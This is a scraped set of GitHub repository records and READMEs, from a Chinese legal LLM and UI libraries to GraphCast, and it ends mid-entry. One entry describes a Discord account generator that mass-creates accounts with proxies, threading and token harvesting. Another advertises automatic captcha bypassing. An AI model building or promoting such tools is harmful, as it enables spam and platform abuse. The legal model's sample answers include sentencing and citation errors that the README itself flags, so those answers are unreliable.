<h1 align="center"> <br> <a href="https://github.com/davidpig/lychee_law"><img src="https://media.discordapp.net/attachments/1029427452470108200/1129060196879184002/lychee_logo.png" alt="Markdownify" width="300"></a> <br> 律知 (Lychee) <br> </h1> <h4 align="center"> ⚖️ 精通中国法律的大语言模型 ⚖️</h4> <h4 align="center"> 法律咨询 | 辩护词生成 | 司法考试辅导 </h4> <p align="center"> <a href="#简介">简介</a> • <a href="#语言模型-">语言模型</a> • <a href="#使用方式-%EF%B8%8F">使用方式</a> • <a href="#展示-">展示</a> • <a href="#免责声明-%EF%B8%8F">免责声明</a> • <a href="#许可证-">许可证</a> </p> ## 简介 【律知】,智能引领,法律全能。 为了让法律服务深入到每个人的身边,让更多的人能够得到法律帮助,我们开启了【律知】这个项目, 致力于打造一系列引领法律智能化的大模型。 我们的 AI 法律模型是一位虚拟法律顾问,具备丰富的法律知识和技能,能够回答法律问题和提供法律建议。 本项目将**开源一系列中文司法领域大模型**,敬请关注,欢迎联系合作 🤝。 ## 语言模型 🤖 * [Law-GLM-10B](https://huggingface.co/law-llm/law-glm-10b): 基于 [GLM-10B](https://github.com/THUDM/GLM) 模型, 在 30GB 中文法律数据上进行指令微调. * 即将推出更强大的法律语言模型, 敬请期待! ## 使用方式 🛠️ 我们推出的语言模型支持 HuggingFace🤗 ```python from transformers import AutoTokenizer, AutoModelForSeq2SeqLM hf_model = "law-llm/law-glm-10b" max_question_length = 64 max_generation_length = 490 tokenizer = AutoTokenizer.from_pretrained( hf_model, cache_dir=model_cache_dir, use_fast=True, trust_remote_code=True ) model = AutoModelForSeq2SeqLM.from_pretrained( hf_model, cache_dir=model_cache_dir, trust_remote_code=True ) model = model.to('cuda') model.eval() model_inputs = "提问: 犯了盗窃罪怎么判刑? 回答: [gMASK]" model_inputs = tokenizer(model_inputs, max_length=max_question_length, padding=True, truncation=True, return_tensors="pt") model_inputs = tokenizer.build_inputs_for_generation(model_inputs, targets=None, max_gen_length=max_generation_length, padding=True) inputs = model_inputs.to('cuda') outputs = model.generate(**inputs, max_length=max_generation_length, eos_token_id=tokenizer.eop_token_id) prediction = tokenizer.decode(outputs[0].tolist()) ``` ## 展示 ✨ ### 1. 法律咨询示例 👩‍🏫 我们的模型能够提供法律咨询服务,在大部分情况下能够依据真实的法律法规生成有指导性的建议。 | 问题 | 回答 (Law-GLM-10B, 2023.07.13, 模型输出) | |:---------------------------:|:------------------------------------------:| |犯了盗窃罪怎么判刑?| 盗窃罪是指以非法占有为目的,窃取他人占有的数额较大的财物,或者多次盗窃的行为。盗窃罪侵犯的对象,仅限于国家、集体或个人的财物,而不是骗取其他非法利益。根据《刑法》第二百六十四条规定,盗窃公私财物,数额较大的,或者多次盗窃、入户盗窃、携带凶器盗窃、扒窃的,处三年以下有期徒刑、拘役或者管制,并处或者单处罚金;数额巨大或者有其他严重情节的,处三年以上十年以下有期徒刑,并处罚金;数额特别巨大或者有其他特别严重情节的,处十年以上有期徒刑或者无期徒刑,并处罚金或者没收财产。 | | 未成年犯罪要承担刑事责任吗? | 未成年犯罪要承担刑事责任。我国《刑法》第十七条规定,已满十六周岁的人犯罪,应当负刑事责任。已满十四周岁不满十六周岁的人,犯故意杀人、故意伤害致人重伤或者死亡、强奸、抢劫、贩卖毒品、放火、爆炸、投放危险物质罪的,应当负刑事责任。已满十二周岁不满十四周岁的人,犯故意杀人、故意伤害罪,致人死亡或者以特别残忍手段致人重伤造成严重残疾,情节恶劣,经最高人民检察院核准追诉的,应当负刑事责任。对依照前三款规定追究刑事责任的不满十八周岁的人,应当从轻或者减轻处罚。因不满十六周岁不予刑事处罚的,责令其父母或者其他监护人加以管教;在必要的时候,依法进行专门矫治教育。 | ### 2. 失败案例 😖 我们的模型还远不够完美.以下是一些失败案例, 模型在这些案例中给出的答案并不完全正确. 我们正在分析模型的局限性,将继续推出更为强大, 准确的版本. | 提问 | 回答 (Law-GLM-10B, 2023.07.13, 模型输出) | 分析 | |:----------------------------------------------:|:----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------:| --- | | 非法集资罪员工如何处理?非法集资罪员工判多少年? | 非法集资罪员工的处理: 1、员工构成非法集资罪的,一般处三年以下有期徒刑或者拘役,并处或者单处罚金;2、员工构成非法集资罪的,一般处三年以上七年以下有期徒刑,并处罚金;3、员工构成非法集资罪的,一般处七年以上有期徒刑,并处罚金或者没收财产。法律依据:《刑法》第一百九十二条以非法占有为目的,使用诈骗方法非法集资,数额较大的,处三年以下有期徒刑或者拘役,并处或者单处罚金;数额巨大或者有其他严重情节的,**处三年以上七年以下有期徒刑**,并处罚金。单位犯前款罪的,对单位判处罚金,并对其直接负责的主管人员和其他直接责任人员,依照前款的规定处罚。 | 法条引用正确, 刑期有错误 (应当为 "处五年以上十年以下有期徒刑") | | 犯人被逮捕后,会通知家属吗?多久会有通知? | 逮捕后,会通知家属。根据 **《刑事诉讼法》第六十九条规定**,公安机关逮捕人的时候,必须出示逮捕证。逮捕后,应当立即将被逮捕人送看守所羁押,至迟不得超过二十四小时。除无法通知或者涉嫌危害国家安全犯罪、恐怖活动犯罪通知可能有碍侦查的情形以外,应当在逮捕后二十四小时以内,通知被逮捕人的家属。有碍侦查的情形消失以后,应当立即通知被逮捕人的家属。 | 回答基本正确, 但法条引用错误 | ## 免责声明 ⚠️ 本平台所提供的服务以及开源的模型依赖于大量的语料库和算法模型进行训练。在训练过程中,模型可能学到数据中的偏差和错误。 因此,模型的输出仅供参考,不能代替专业的法律咨询。 使用者必须了解语言模型的局限性并自行承担风险。 本平台不会对使用者因为使用我们的模型和服务导致的损失承担责任。当遇到实际的法律问题时,建议咨询专业法律顾问。 ## 许可证 📃 Apache-2.0 ## 项目参与者 本项目由沈晓宇, 朱大卫发起, 与南京大学学软件学院研究生费志伟, 李奇, 申宗汶以及副教授[葛季栋](https://software.nju.edu.cn/gjd/), 萨尔大学研究生王潇, 西安财经大学崔俊云合作研发。 如果你喜欢我们的项目, 欢迎 **Star**⭐, [**Fork**](https://github.com/davidpig/lychee_law/fork) 🍴 和 **分享**📡。 --- > GitHub [davidpig](https://github.com/davidpig)&nbsp;&middot;&nbsp; > Email [[email protected]](mailto:[email protected])
12
1
tsinghua-lau/fusion-ui
https://github.com/tsinghua-lau/fusion-ui
刚起步 . . .
简体中文 | [English](./README.en-CN.md) <p align="center"> <img width="120px" height="100px" src="https://img-blog.csdnimg.cn/99f1d53fa0b244809eee1a8a359e3261.png#pic_center" > </p> <h1 align="center">Fusion UI</h1> <p align="center">Fusion Ui /ˈfjuːʒ(ə)n/ 是一个 Vue3 组件库,简洁、优雅、美观,帮助你快速构建网站。</p> </p> ## 特性 - 🧜 组件设计-提供整洁和美丽的精心制作的 UI 组件。 - 🎡 按需引入-提供解析器以自动导入仅使用过的组件。 - 💪 支持 TypeScript-支持类型脚本和类型检查及类型推断。 - ⚡️ 全面基于 Vite,速度够快 - 📃 详细的中/英文档 - 🛠 More... ## 安装 ``` # pnpm $ pnpm add fusion-ui-vue # npm $ npm install fusion-ui-vue # yarn $ yarn add fusion-ui-vue ``` ## 文档 - [DOCS](https://tsinghua-lau.github.io/fusion-ui/#/) ## 兼容性 现代浏览器支持所有组件,只支持两到三个版本。 | [![IE / Edge](https://cdn.nlark.com/yuque/0/2023/png/785653/1676598386595-58e6efd6-bd29-4671-bf28-e289dc8911e2.png)](http://godban.github.io/browsers-support-badges/) IE / Edge | [![Firefox](https://cdn.nlark.com/yuque/0/2023/png/785653/1676598386577-a25d20a4-c8e3-4c57-86bc-a1c853264457.png)](http://godban.github.io/browsers-support-badges/) Firefox | [![Chrome](https://cdn.nlark.com/yuque/0/2023/png/785653/1676598386568-5c1d71d1-732d-41b6-a20c-9900d1bcaa7a.png)](http://godban.github.io/browsers-support-badges/) Chrome | [![Safari](https://cdn.nlark.com/yuque/0/2023/png/785653/1676598386580-1a0870a7-0483-4c92-84ee-5afcd1da92d6.png)](http://godban.github.io/browsers-support-badges/) Safari | [![Opera](https://cdn.nlark.com/yuque/0/2023/png/785653/1676598386571-49e31a0f-d0e4-4efc-8808-a5eedd4101fe.png)](http://godban.github.io/browsers-support-badges/) Opera | [![Electron](https://cdn.nlark.com/yuque/0/2023/png/785653/1676598389214-b4742a92-cfe7-4730-aefb-f2fb5fd046f3.png)](http://godban.github.io/browsers-support-badges/) Electron | | :------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | :--------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | :------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | :------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | :----------------------------------------------------------------------------------------------------------------------------------------------------------------------- | :----------------------------------------------------------------------------------------------------------------------------------------------------------------------------- | | last 2 versions | last 2 versions | last 2 versions | last 2 versions | last 2 versions | last 2 versions | ## 版本 [![release version](https://img.shields.io/npm/v/fusion-ui-vue.svg?label=FusionUi&color=blue)](https://www.npmjs.com/package/fusion-ui-vue) 您可以订阅此提要以获取新版本通知: https://github.com/tsinghua-lau/fusion-ui/releases ## 问题 如果有建议欢迎 [issue](https://github.com/tsinghua-lau/fusion-ui/issues)。 ## 提交 如果你对这个项目感兴趣,欢迎加入。 - [贡献指南](https://github.com/tsinghua-lau/fusion-ui/blob/master/CONTRIBUTING.md) ## 贡献者 <a href="https://github.com/tsinghua-lau/fusion-ui/graphs/contributors"> <img src="https://contrib.rocks/image?repo=tsinghua-lau/fusion-ui" /> </a>
16
1
KawaiiKillar/AutoCaptcha
https://github.com/KawaiiKillar/AutoCaptcha
Introducing AutoCaptcha: Free AI Solver, your ultimate tool for effortlessly bypassing captchas. Powered by advanced AI technology, this extension is designed to automatically solve hCaptcha and reCaptcha, completely free of charge.
# AutoCaptcha Introducing AutoCaptcha: Free AI Solver, your ultimate tool for effortlessly bypassing captchas. Powered by advanced AI technology, this extension is designed to automatically solve hCaptcha and reCaptcha, completely free of charge.
30
4
fozilovbro/vue-pro-boilerplate
https://github.com/fozilovbro/vue-pro-boilerplate
Vue.js 3 boilerplate for large-scale projects
## Vue.js 3 boilerplate for large-scale projects This project was developed based on the **Feature Sliced Design** Architectural methodology. This boilerplate demonstrates the proper organization of your frontend project. It offers an easily discoverable architecture through domain scopes, allowing for flexible replacement and addition of architecture components to meet new requirements. Each module can be modified or rewritten independently without causing side effects. The project maintains a balance between DRY (Don't Repeat Yourself) principles and local customization, ensuring efficient and effective development. > [Feature Sliced Design](https://feature-sliced.design/) - Architectural methodology for frontend projects. Kamron Fozilov - Telegram channel: [@fozilovbro](https://t.me/fozilovbro) - Telegram chat: [@fozilovkamron](https://t.me/fozilovkamron) - Telegram group: [@vuejs_uz](https://t.me/vuejs_uz)
23
3
Oskar0112/oskar-portfolio
https://github.com/Oskar0112/oskar-portfolio
Portfolio using Next
<div align="center"> <img alt="Oskar Portfolio logo" src="/public/oskar.svg" width="100" /> </div> <h1 align="center"> Oskar Portfolio - Avenue Labs landing page template 🚀 </h1> Oskar Portfolio is a customizable NextJS and TailwindCSS landing page template that offers personalized styling and easy customization. Tailored to provide a minimal design, it allows you to effortlessly create a site that suits your requirements. You can easily make use of the components and customize the code to mix and match to suit your needs. <hr> ![Oskar Portfolio Mockup](/public/oskar.png) ## Key Features: - Minimal styling (make it your own!) - Accessible, semantic HTML markup - Blazingly Fast - 100/100 Lighthouse performance - Responsive & SEO-friendly with canonical URLs, OpenGraph data and Meta tags. - Sitemap support - Made with NextJS and TailwindCSS ## Deploy your own Deploy the example using [Vercel](https://vercel.com?utm_source=github&utm_medium=readme&utm_campaign=next-example). If you want to deploy on Netlify, use the following build command under site settings: ```bash npm run build ``` You also want to make sure the publish directory is out. ## Lighthouse Score Oskar Portfolio scores 100/100 in the Lighthouse performance audit. ![Oskar Portfolio Lighthouse Score](/lighthouse-score.png) ## Demo Check out the [Demo](https://oskar.avenuelabs.co/), hosted on Vercel. ## Commands All commands are run from the root of the project, from a terminal: | Command | Action | | :-------------- | :------------------------------------------- | | `npm install` | Installs dependencies | | `npm run dev` | Starts local dev server at `localhost:3000` | | `npm run build` | Build your production site to `./next/` | | `npm run start` | Preview your build locally, before deploying | ## Update Site Metadata ```js env: { siteTitle: 'Your Company', siteDescription: 'Your company description.', siteKeywords: 'your company keywords', siteUrl: 'https://oskar.avenuelabs.co/', siteImagePreviewUrl: '/images/preview.jpeg', twitterHandle: '@your_handle' } ``` ## Update Colors You can update the colors in tailwind.config.js file. ## Update Favicon Update the manifest.json file and the icons under the public/images/icons folder. You can use free tools online such as https://realfavicongenerator.net/ to quickly generate all the different icon sizes and favicon.ico file. ## License Licensed under the MIT License, Copyright © 2023 ## Feedback and Suggestions If you have any suggestions/feedback, you can contact the creator, Christian Luntok, via [[email protected]](mailto:[email protected]). Alternatively, feel free to open an issue if you find bugs or want to request new features. --- Made by [Christian Luntok - Avenue Labs](https://avenuelabs.co/)
13
0
OringoDevelopment/discord-token-generator
https://github.com/OringoDevelopment/discord-token-generator
Discord Token Generator 🔥WORKING JULY 2023🔥 Discord Token generator written in python3 discord account gen token gen token generator account generator generator generator token gen token generator discord token gen discord token generator discord token generator discord token generator discord token generator token gen discord token gen account
# Discord-Token-Generator Proof of concept of how the creation of Discord accounts can be automated without the need to type/click buttons on browser. ## About A script that automates creating discord accounts. It shows how accounts can be created automatically without the user typing unless there is a captcha (h-Captcha just needs to be clicked) . It automatically verifies your Discord account via email for you and automatically saves login info in `login.txt` in `email:password:token` format. This is used for educational purposes only. ## Chromedriver Fix If Chrome doesn't open/crashes, try getting the latest version of chromedriver.exe here > https://chromedriver.chromium.org/downloads. Replace the current chromedriver.exe in the folder with the latest version you have downloaded Make sure your chromedriver.exe file is the same version as your current Chrome web browser version. To check your current Chrome version, paste chrome://settings/help in chrome. ## Features - Auto scrape email - Random username from list - Random password - Random date - Auto-email-verify - Automatically get Discord token and other login info - Proxy support - Multi-threading ## Preview ![Picture](https://i.ibb.co/SvsPwrD/Screenshot-525.png) ## Usage 1. You can customize usernames by editing the usernames in discord_usernames.txt. 2. Run the file and use normal mode if you are a inexperienced with proxies and theading. ### Get Python If you dont have python installed, download the newest python and make sure you click on the 'ADD TO PATH' option during the installation. ### Run via Python 1. install the required modules ``` pip install selenium pip install undetected-chromedriver pip install colorama pip install bs4 pip install lxml pip install requests ``` 2. To run the script.. ``` python discordgenerator.py ``` #### Proxy support - If you want to use proxies, simply paste the proxies in config/proxies.txt. If you want to stop using proxies, just remove all the proxies from the .txt file. The script automatically checks for proxies on startup. HTTP proxies are only supported as of now. If the proxies are not alive, the script will throw a WebDriver error. #### Threading mode - Uses multiple chrome windows - Only run this when you have proxies or else one of you Chrome windows will get rate limited. - Do put more than 6 threads unless you think your PC can handle it. I recommend using 2-3 threads. #### No Threading - This only uses one chrome window. #### FAQ Where can i found my generated accounts? 1. It is located in the output folder. Open up login.txt to see the accounts that has been generated.
11
810
huajianmao/openai.mini
https://github.com/huajianmao/openai.mini
Implemente OpenAI APIs with open source LLM and other models.
# [WIP] OpenAI.mini This repo implements OpenAI APIs with open source models, for example, `LLaMA` for [chat](https://platform.openai.com/docs/api-reference/chat), `Whisper` for [audio](https://platform.openai.com/docs/api-reference/audio), `SDXL` for [image](https://platform.openai.com/docs/api-reference/images), `intfloat/e5-large-v2` for [embeddings](https://platform.openai.com/docs/api-reference/embeddings), and so on. With this repo, you can interact with LLMs using the [`openai` libraries](https://platform.openai.com/docs/api-reference) or the [`LangChain`](https://python.langchain.com/) library. ## Development ### Install dependencies - `make install` Start development server with the following command: - `cp .env.example .env`, and modify the `.env` file on your need - `make run` Notice: the models can be loadded on startup or on the fly. ## Status | Services | API | Status | Description | | :-----------------| :------------------------------------------------------------------------------------------------------| :----------------| :-----------------------| | Authorization | | | | | Models | [List models](https://platform.openai.com/docs/api-reference/models/list) | ✅ Done | | | Models | [Retrieve model](https://platform.openai.com/docs/api-reference/models/retrieve) | | | | Chat | [Create chat completion](https://platform.openai.com/docs/api-reference/chat/create) | Partial Done | Support Multi. LLMs | | Completions | [Create completion](https://platform.openai.com/docs/api-reference/completions/create) | | | | Images | [Create image](https://platform.openai.com/docs/api-reference/images/create) | ✅ Done | | | Images | [Create image edit](https://platform.openai.com/docs/api-reference/images/create-edit) | | | | Images | [Create image variation](https://platform.openai.com/docs/api-reference/images/create-variation) | | | | Embeddings | [Create embeddings](https://platform.openai.com/docs/api-reference/embeddings/create) | ✅ Done | Support Multi. LLMs | | Audio | [Create transcription](https://platform.openai.com/docs/api-reference/audio/create-transcription) | ✅ Done | | | Audio | [Create translation](https://platform.openai.com/docs/api-reference/audio/create-translation) | ✅ Done | | | Files | [List files](https://platform.openai.com/docs/api-reference/files/list) | ✅ Done | | | Files | [Upload file](https://platform.openai.com/docs/api-reference/files/upload) | ✅ Done | | | Files | [Delete file](https://platform.openai.com/docs/api-reference/files/delete) | ✅ Done | | | Files | [Retrieve file](https://platform.openai.com/docs/api-reference/files/retrieve) | ✅ Done | | | Files | [Retrieve file content](https://platform.openai.com/docs/api-reference/files/retrieve-content) | ✅ Done | | | Fine-tunes | [Create fine-tune](https://platform.openai.com/docs/api-reference/fine-tunes/create) | | | | Fine-tunes | [List fine-tunes](https://platform.openai.com/docs/api-reference/fine-tunes/list) | | | | Fine-tunes | [Retrieve fine-tune](https://platform.openai.com/docs/api-reference/fine-tunes/retrieve) | | | | Fine-tunes | [Cancel fine-tune](https://platform.openai.com/docs/api-reference/fine-tunes/cancel) | | | | Fine-tunes | [List fine-tune events](https://platform.openai.com/docs/api-reference/fine-tunes/events) | | | | Fine-tunes | [Delete fine-tune model](https://platform.openai.com/docs/api-reference/fine-tunes/delete-model) | | | | Moderations | [Create moderation](https://platform.openai.com/docs/api-reference/moderations/create) | | | | Edits | [Create edit](https://platform.openai.com/docs/api-reference/edits/create) | | | ## Supported Language Models | Model | #Params | Checkpoint link | | :------------------------------------------------------------------------------------ | :------ | :-------------------------------------------------------------------------------------- | | [FreeWilly2](https://stability.ai/blog/freewilly-large-instruction-fine-tuned-models) | 70B | [stabilityai/FreeWilly2](https://huggingface.co/stabilityai/FreeWilly2) | | [Baichuan-13B-Chat](https://github.com/baichuan-inc/Baichuan-13B) | 13B | [baichuan-inc/Baichuan-13B-Chat](https://huggingface.co/baichuan-inc/Baichuan-13B-Chat) | | [Llama-2-13b-chat-hf](https://github.com/facebookresearch/llama) | 13B | [meta-llama/Llama-2-13b-chat-hf](https://huggingface.co/meta-llama/Llama-2-13b-chat-hf) | | [Llama-2-7b-chat-hf](https://github.com/facebookresearch/llama) | 7B | [meta-llama/Llama-2-7b-chat-hf](https://huggingface.co/meta-llama/Llama-2-7b-chat-hf) | | [Qwen-7B-Chat](https://github.com/QwenLM/Qwen-7B) | 7B | [Qwen/Qwen-7B-Chat](https://huggingface.co/Qwen/Qwen-7B-Chat) | | [internlm-chat-7b](https://github.com/InternLM/InternLM) | 7B | [internlm/internlm-chat-7b](https://huggingface.co/internlm/internlm-chat-7b) | | [chatglm2-6b](https://github.com/THUDM/ChatGLM2-6B) | 6B | [THUDM/chatglm2-6b](https://huggingface.co/THUDM/chatglm2-6b) | | [chatglm-6b](https://github.com/THUDM/ChatGLM-6B) | 6B | [THUDM/chatglm-6b](https://huggingface.co/THUDM/chatglm-6b) | ## Supported Embedding Models | Model | Embedding Dim.| Sequnce Length | Checkpoint link | | :------------------------------------------------------------------------------------ | :------ | :----- | :-------------------------------------------------------------------------------------- | | [gte-large](https://huggingface.co/thenlper/gte-large) | 1024 | 512 | [thenlper/gte-large](https://huggingface.co/thenlper/gte-large) | | [e5-large-v2](https://huggingface.co/intfloat/e5-large-v2) | 1024 | 512 | [intfloat/e5-large-v2](https://huggingface.co/intfloat/e5-large-v2) | ## Supported Diffusion Modles | Model | #Resp Format | Checkpoint link | | :-------------------------------------------------------------------------------- | :----------- | :---------------------------------------------------------------------------------------------------------- | | [stable-diffusion-xl-base-1.0](https://github.com/Stability-AI/generative-models) | b64_json | [stabilityai/stable-diffusion-xl-base-1.0](https://huggingface.co/stabilityai/stable-diffusion-xl-base-1.0) | | [stable-diffusion-xl-base-0.9](https://github.com/Stability-AI/generative-models) | b64_json | [stabilityai/stable-diffusion-xl-base-0.9](https://huggingface.co/stabilityai/stable-diffusion-xl-base-0.9) | ## Supported Audio Models | Model | #Params | Checkpoint link | |:------|:--------|:---------------| | [whisper-1](https://github.com/openai/whisper) | 1550 | alias for [whisper-large-v2](https://openaipublic.azureedge.net/main/whisper/models/81f7c96c852ee8fc832187b0132e569d6c3065a3252ed18e56effd0b6a73e524/large-v2.pt) | | [whisper-large-v2](https://github.com/openai/whisper) | 1550 M | [large-v2](https://openaipublic.azureedge.net/main/whisper/models/81f7c96c852ee8fc832187b0132e569d6c3065a3252ed18e56effd0b6a73e524/large-v2.pt) | | [whisper-medium](https://github.com/openai/whisper) | 769 M | [medium](https://openaipublic.azureedge.net/main/whisper/models/345ae4da62f9b3d59415adc60127b97c714f32e89e936602e85993674d08dcb1/medium.pt) | | [whisper-small](https://github.com/openai/whisper) | 244 M | [small](https://openaipublic.azureedge.net/main/whisper/models/9ecf779972d90ba49c06d968637d720dd632c55bbf19d441fb42bf17a411e794/small.pt) | | [whisper-base](https://github.com/openai/whisper) | 74 M | [base](https://openaipublic.azureedge.net/main/whisper/models/ed3a0b6b1c0edf879ad9b11b1af5a0e6ab5db9205f891f668f8b0e6c6326e34e/base.pt) | | [whisper-tiny](https://github.com/openai/whisper) | 39 M | [tiny](https://openaipublic.azureedge.net/main/whisper/models/65147644a518d12f04e32d6f3b26facc3f8dd46e5390956a9424a650c0ce22b9/tiny.pt) | ## Example Code ### Stream Chat ```python import openai openai.api_base = "http://localhost:8000/api/v1" openai.api_key = "none" for chunk in openai.ChatCompletion.create( model="Baichuan-13B-Chat", messages=[{"role": "user", "content": "Which moutain is the second highest one in the world?"}], stream=True ): if hasattr(chunk.choices[0].delta, "content"): print(chunk.choices[0].delta.content, end="", flush=True) ``` ### Chat ```python import openai openai.api_base = "http://localhost:8000/api/v1" openai.api_key = "none" resp = openai.ChatCompletion.create( model="Baichuan-13B-Chat", messages = [{ "role":"user", "content": "Which moutain is the second highest one in the world?" }] ) print(resp.choices[0].message.content) ``` ### Create Embeddings ```python import openai openai.api_base = "http://localhost:8000/api/v1" openai.api_key = "none" embeddings = openai.Embedding.create( model="gte-large", input="The food was delicious and the waiter..." ) print(embeddings) ``` ### List LLM Models ```python import os import openai openai.api_base = "http://localhost:8000/api/v1" openai.api_key = "none" openai.Model.list() ``` ### Create Image ```python import os import openai from base64 import b64decode from IPython.display import Image openai.api_base = "http://localhost:8000/api/v1" openai.api_key = "none" response = openai.Image.create( prompt="An astronaut riding a green horse", n=1, size="1024x1024", response_format='b64_json' ) b64_json = response['data'][0]['b64_json'] image = b64decode(b64_json) Image(image) ``` ### Create Transcription ```python # Cell 1: set openai import openai openai.api_base = "http://localhost:8000/api/v1" openai.api_key = "None" # Cell 2: create a recorder in notebook # =================================================== # sudo apt install ffmpeg # pip install torchaudio ipywebrtc notebook # jupyter nbextension enable --py widgetsnbextension from IPython.display import Audio from ipywebrtc import AudioRecorder, CameraStream camera = CameraStream(constraints={'audio': True,'video':False}) recorder = AudioRecorder(stream=camera) recorder # Cell 3: transcribe import os import openai temp_file = '/tmp/recording.webm' with open(temp_file, 'wb') as f: f.write(recorder.audio.value) audio_file = open(temp_file, "rb") transcript = openai.Audio.transcribe("whisper-1", audio_file) print(transcript.text) ```
15
1
deepmind/graphcast
https://github.com/deepmind/graphcast
null
# GraphCast: Learning skillful medium-range global weather forecasting This package contains example code to run and train [GraphCast](https://arxiv.org/abs/2212.12794). It also provides three pretrained models: 1. `GraphCast`, the high-resolution model used in the GraphCast paper (0.25 degree resolution, 37 pressure levels), trained on ERA5 data from 1979 to 2017, 2. `GraphCast_small`, a smaller, low-resolution version of GraphCast (1 degree resolution, 13 pressure levels, and a smaller mesh), trained on ERA5 data from 1979 to 2015, useful to run a model with lower memory and compute constraints, 3. `GraphCast_operational`, a high-resolution model (0.25 degree resolution, 13 pressure levels) pre-trained on ERA5 data from 1979 to 2017 and fine-tuned on HRES data from 2016 to 2021. This model can be initialized from HRES data (does not require precipitation inputs). The model weights, normalization statistics, and example inputs are available on [Google Cloud Bucket](https://console.cloud.google.com/storage/browser/dm_graphcast). Full model training requires downloading the [ERA5](https://www.ecmwf.int/en/forecasts/datasets/reanalysis-datasets/era5) dataset, available from [ECMWF](https://www.ecmwf.int/). ## Overview of files The best starting point is to open `graphcast_demo.ipynb` in [Colaboratory](https://colab.research.google.com/github/deepmind/graphcast/blob/master/graphcast_demo.ipynb), which gives an example of loading data, generating random weights or load a pre-trained snapshot, generating predictions, computing the loss and computing gradients. The one-step implementation of GraphCast architecture, is provided in `graphcast.py`. ### Brief description of library files: * `autoregressive.py`: Wrapper used to run (and train) the one-step GraphCast to produce a sequence of predictions by auto-regressively feeding the outputs back as inputs at each step, in JAX a differentiable way. * `casting.py`: Wrapper used around GraphCast to make it work using BFloat16 precision. * `checkpoint.py`: Utils to serialize and deserialize trees. * `data_utils.py`: Utils for data preprocessing. * `deep_typed_graph_net.py`: General purpose deep graph neural network (GNN) that operates on `TypedGraph`'s where both inputs and outputs are flat vectors of features for each of the nodes and edges. `graphcast.py` uses three of these for the Grid2Mesh GNN, the Multi-mesh GNN and the Mesh2Grid GNN, respectively. * `graphcast.py`: The main GraphCast model architecture for one-step of predictions. * `grid_mesh_connectivity.py`: Tools for converting between regular grids on a sphere and triangular meshes. * `icosahedral_mesh.py`: Definition of an icosahedral multi-mesh. * `losses.py`: Loss computations, including latitude-weighting. * `model_utils.py`: Utilities to produce flat node and edge vector features from input grid data, and to manipulate the node output vectors back into a multilevel grid data. * `normalization.py`: Wrapper for the one-step GraphCast used to normalize inputs according to historical values, and targets according to historical time differences. * `predictor_base.py`: Defines the interface of the predictor, which GraphCast and all of the wrappers implement. * `rollout.py`: Similar to `autoregressive.py` but used only at inference time using a python loop to produce longer, but non-differentiable trajectories. * `typed_graph.py`: Definition of `TypedGraph`'s. * `typed_graph_net.py`: Implementation of simple graph neural network building blocks defined over `TypedGraph`'s that can be combined to build deeper models. * `xarray_jax.py`: A wrapper to let JAX work with `xarray`s. * `xarray_tree.py`: An implementation of tree.map_structure that works with `xarray`s. ### Dependencies. [Chex](https://github.com/deepmind/chex), [Dask](https://github.com/dask/dask), [Haiku](https://github.com/deepmind/dm-haiku), [JAX](https://github.com/google/jax), [JAXline](https://github.com/deepmind/jaxline), [Jraph](https://github.com/deepmind/jraph), [Numpy](https://numpy.org/), [Pandas](https://pandas.pydata.org/), [Python](https://www.python.org/), [SciPy](https://scipy.org/), [Tree](https://github.com/deepmind/tree), [Trimesh](https://github.com/mikedh/trimesh) and [XArray](https://github.com/pydata/xarray). ### License and attribution The Colab notebook and the associated code are licensed under the Apache License, Version 2.0. You may obtain a copy of the License at: https://www.apache.org/licenses/LICENSE-2.0. The model weights are made available for use under the terms of the Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International (CC BY-NC-SA 4.0). You may obtain a copy of the License at: https://creativecommons.org/licenses/by-nc-sa/4.0/. The weights were trained on ECMWF's ERA5 and HRES data. The colab includes a few examples of ERA5 and HRES data that can be used as inputs to the models. ECMWF data product are subject to the following terms: 1. Copyright statement: Copyright "© 2023 European Centre for Medium-Range Weather Forecasts (ECMWF)". 2. Source www.ecmwf.int 3. Licence Statement: ECMWF data is published under a Creative Commons Attribution 4.0 International (CC BY 4.0). https://creativecommons.org/licenses/by/4.0/ 4. Disclaimer: ECMWF does not accept any liability whatsoever for any error or omission in the data, their availability, or for any loss or damage arising from their use. ### Disclaimer This is not an officially supported Google product. Copyright 2023 DeepMind Technologies Limited. ### Citation If you use this work, consider citing our [paper](https://arxiv.org/abs/2212.12794): ```latex @article{lam2022graphcast, title={GraphCast: Learning skillful medium-range global weather forecasting}, author={Remi Lam and Alvaro Sanchez-Gonzalez and Matthew Willson and Peter Wirnsberger and Meire Fortunato and Alexander Pritzel and Suman Ravuri and Timo Ewalds and Ferran Alet and Zach Eaton-Rosen and Weihua Hu and Alexander Merose and Stephan Hoyer and George Holland and Jacklynn Stott and Oriol Vinyals and Shakir Mohamed and Peter Battaglia}, year={2022}, eprint={2212.12794}, archivePrefix={arXiv}, primaryClass={cs.LG} } ```
43
3
alloy-rs/rlp
https://github.com/alloy-rs/rlp
Fast implementation of Ethereum RLP serialization
# RLP A fast and simple [Ethereum RLP][rlp] implementation in Rust. [rlp]: https://ethereum.org/en/developers/docs/data-structures-and-encoding/rlp [![Build Status][actions-badge]][actions-url] [![Telegram chat][telegram-badge]][telegram-url] [actions-badge]: https://img.shields.io/github/actions/workflow/status/alloy-rs/rlp/ci.yml?branch=main&style=for-the-badge [actions-url]: https://github.com/alloy-rs/rlp/actions?query=branch%3Amain [telegram-badge]: https://img.shields.io/endpoint?color=neon&style=for-the-badge&url=https%3A%2F%2Ftg.sumanjay.workers.dev%2Fethers_rs [telegram-url]: https://t.me/ethers_rs ## Supported Rust Versions <!-- When updating this, also update: - .clippy.toml - Cargo.toml - .github/workflows/ci.yml --> Alloy will keep a rolling MSRV (minimum supported rust version) policy of **at least** 6 months. When increasing the MSRV, the new Rust version must have been released at least six months ago. The current MSRV is 1.64.0. Note that the MSRV is not increased automatically, and only as part of a minor release. ## Contributing Thanks for your help improving the project! We are so happy to have you! We have [a contributing guide](./CONTRIBUTING.md) to help you get involved in the Alloy project. Pull requests will not be merged unless CI passes, so please ensure that your contribution follows the linting rules and passes clippy. ## Provenance note These crates were originally part of the [reth] project, as [`reth_rlp`] and [`reth_rlp_derive`]. `reth_rlp` was forked from an earlier 